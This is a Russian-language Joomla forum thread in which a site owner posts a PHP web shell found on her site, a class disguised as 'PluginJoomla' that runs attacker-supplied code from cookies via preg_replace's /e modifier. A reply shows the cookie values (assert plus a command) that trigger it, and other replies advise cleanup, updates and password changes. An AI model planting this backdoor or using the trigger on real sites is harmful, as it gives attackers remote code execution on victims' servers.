0 Пользователей и 1 Гость просматривают эту тему.
  • 14 Ответов
  • 1317 Просмотров
*

katerrinka

  • Новичок
  • 7
  • 0 / 0
2 файла:

administrator/components/weklz.php


<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;

Что можно с ними сделать? удалить? закомментировать?
*

dmitry_stas

  • Легенда
  • 13152
  • 1232 / 8
Re: нашла вирусы, что с ними делать?
« Ответ #1 : 07.02.2016, 18:14:16 »
делайте что угодно, главное поймите, что это не решит вашу проблему. вам надо найти и устранить дыру через которую они к вам попали.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

katerrinka

  • Новичок
  • 7
  • 0 / 0
Re: нашла вирусы, что с ними делать?
« Ответ #2 : 07.02.2016, 18:25:24 »
Вот второй файл насколько я поняла из статьи на хабре и есть шелл:

Спойлер
[свернуть]
« Последнее редактирование: 07.02.2016, 21:52:00 от flyingspook »
*

katerrinka

  • Новичок
  • 7
  • 0 / 0
Re: нашла вирусы, что с ними делать?
« Ответ #3 : 07.02.2016, 18:33:07 »
Дальше планирую удалить всякие модули типо обратной связи. Закрыть доступ в админку и доступ по ftp.
*

dmitry_stas

  • Легенда
  • 13152
  • 1232 / 8
Re: нашла вирусы, что с ними делать?
« Ответ #4 : 07.02.2016, 18:55:46 »
Дальше планирую удалить всякие модули типо обратной связи.
почему именно их?
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

vipiusss

  • Гуру
  • 5746
  • 344 / 11
  • Скайп: renor_
Re: нашла вирусы, что с ними делать?
« Ответ #5 : 07.02.2016, 19:03:04 »
почему именно их?
Видно что под горячую руку попалось или под женскую логику :)

///

Катеринка:вам стоило бы, как вам указали выше, понять, откуда это и возможно в шаблоне/расширении изначально было, а не заразили вас!

И может и дырка в коде или иная уязвимость.
А вы сразу, как хирурги-лижбы резать.
Миграция, установка, обновление версий Joomla  |  Создание сайтов "под ключ"  |  Эксклюзивные заглушки "offline"  |  Работа с "напильником" над шаблонами и расширениями
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: нашла вирусы, что с ними делать?
« Ответ #6 : 07.02.2016, 21:53:02 »
Вам чистить и обновлять сайт с расширениями надо.
*

voland

  • Легенда
  • 11011
  • 585 / 112
  • Эта строка съедает место на вашем мониторе
Re: нашла вирусы, что с ними делать?
« Ответ #7 : 07.02.2016, 21:55:43 »
Можно их на 5 минут в микроволновку и потом соусом чили полить - будет вкусно.
*

ChaosHead

  • Гуру
  • 5229
  • 450 / 13
Re: нашла вирусы, что с ними делать?
« Ответ #8 : 08.02.2016, 00:01:39 »
Вирусы - это программы, которые сами распространяются, а у вас тут просто кто-то ходит через заднюю дверь и "хозяйничает" с вашим сайтом.
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Re: нашла вирусы, что с ними делать?
« Ответ #9 : 08.02.2016, 09:52:30 »
2 файла:

administrator/components/weklz.php


<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;

Что можно с ними сделать? удалить? закомментировать?

в куках примерно так:
Цитировать
41bjGEDj3=assert; 41bjGEDj1=echo "ТУТ БЫЛ ВАСЯ";
для болие коректного кода в базе 64 засунте))
*

dmitry_stas

  • Легенда
  • 13152
  • 1232 / 8
Re: нашла вирусы, что с ними делать?
« Ответ #10 : 08.02.2016, 11:11:19 »
в куках примерно так:

мне почему то кажется что на вопрос

Что можно с ними сделать?

ожидался другой ответ  ;D
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

CCTRRoman

  • Захожу иногда
  • 120
  • 3 / 0
Re: нашла вирусы, что с ними делать?
« Ответ #11 : 08.02.2016, 12:30:54 »
Попробуйте
1. https://www.revisium.com/ai/
или
2. https://www.reg.ru/support/hosting-i-servery/servery-vps/reshenie-problem-raboty-vps/kak-proverit-server-na-nalichie-virusov
или
3. https://www.rsjoomla.com/joomla-extensions/joomla-security.html

ну а затем, после удаления всего лишнего, поменять все пароли на всё,
обновить всё на сайте до последних версий
и не пользоваться варезными расширениями :-)
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Re: нашла вирусы, что с ними делать?
« Ответ #12 : 08.02.2016, 20:11:08 »
или
3. https://www.rsjoomla.com/joomla-extensions/joomla-security.html

ну а затем, после удаления всего лишнего, поменять все пароли на всё,
обновить всё на сайте до последних версий
и не пользоваться варезными расширениями :-)
Крайне не рекомендую этот сервис
*

Lentochka

  • Осваиваюсь на форуме
  • 43
  • 7 / 0
Re: нашла вирусы, что с ними делать?
« Ответ #13 : 09.02.2016, 09:44:22 »
Крайне не рекомендую этот сервис
А что с ним не так?
*

winstrool

  • Давно я тут
  • 814
  • 51 / 2
  • Свободен для работы
Re: нашла вирусы, что с ними делать?
« Ответ #14 : 09.02.2016, 13:13:33 »
А что с ним не так?
Если вы что то понимаете в природе уязвимостей, и имеете четкое представление к чему это ведет, то вот пост https://forum.antichat.ru/threads/50600/page-16#post-3923889
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

Ответов: 792
Просмотров: 252584
Последний ответ 23.02.2020, 21:18:16
от draff
Вирусы на сайте - как лечить

Автор fireman

Ответов: 37
Просмотров: 2854
Последний ответ 08.11.2017, 23:37:08
от dmitry_stas
Проверка на вирусы: как не удалить нужный файл

Автор Vosblog

Ответов: 4
Просмотров: 1251
Последний ответ 05.09.2017, 23:12:57
от ELLE
Обноружен Swf.Exploit.CVE_2016_0995-1 на сайте, что делать?

Автор Elimelech

Ответов: 1
Просмотров: 670
Последний ответ 29.04.2017, 11:26:44
от ProtectYourSite
Взлом или Joomla должна штатно такое делать?

Автор alpeichik

Ответов: 19
Просмотров: 1504
Последний ответ 04.02.2017, 19:48:38
от flyingspook